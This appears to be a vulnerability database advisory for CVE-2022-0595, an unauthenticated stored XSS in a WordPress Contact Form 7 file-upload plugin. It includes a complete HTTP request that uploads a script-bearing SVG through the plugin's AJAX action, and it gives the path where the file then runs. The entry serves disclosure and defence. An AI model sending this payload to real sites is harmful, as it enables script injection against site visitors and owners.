Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitBrandon James RoldanWPEX-ID:1B849957-EACA-47EA-8F84-23A3A98CC8DE
HistoryMar 07, 2022 - 12:00 a.m.

Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS

2022-03-0700:00:00
Brandon James Roldan
317
file upload
contact form
xss
unauthenticated
security vulnerability
code injection

EPSS

0.001

Percentile

41.9%

JSON

The plugin allows SVG files to be uploaded by default via the dnd_codedropz_upload AJAX action, which could lead to Stored Cross-Site Scripting issue

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161
Content-Length: 655
Connection: close

-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="size_limit"

10485760
-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="action"

dnd_codedropz_upload
-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="type"

click
-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="upload-file"; filename="xss.svg"
Content-Type: image/jpeg

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(/XSS/)"/>
-----------------------------92633278134516118923780781161--


Then open https://example.com/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/xss.svg

Related

nvd 1
patchstack 1
cnvd 1
hackerone 1
cvelist 1
cve 1
prion 1
wpvulndb 1
nuclei 1
nvd
nvd
CVE-2022-0595
2022-03-28 18:15:09
patchstack
patchstack
WordPress Drag and Drop Multiple File Upload – Contact Form 7 plugin <= 1.3.6.2 - Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability
2022-03-07 00:00:00
cnvd
cnvd
WordPress Drag and Drop Multiple File Upload plugin cross-site scripting vulnerability
2022-03-30 00:00:00
hackerone
hackerone
Nord Security: Stored XSS at nordvpn.com
2023-01-19 23:35:23
cvelist
cvelist
CVE-2022-0595 Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS
2022-03-28 17:22:57
cve
cve
CVE-2022-0595
2022-03-28 18:15:09
prion
prion
Cross site scripting
2022-03-28 18:15:00
wpvulndb
wpvulndb
Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS
2022-03-07 00:00:00
nuclei
nuclei
WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting
2022-04-24 09:53:15

EPSS

0.001

Percentile

41.9%

JSON
Related for WPEX-ID:1B849957-EACA-47EA-8F84-23A3A98CC8DE
nvd1patchstack1cnvd1hackerone1cvelist1cve1prion1wpvulndb1nuclei1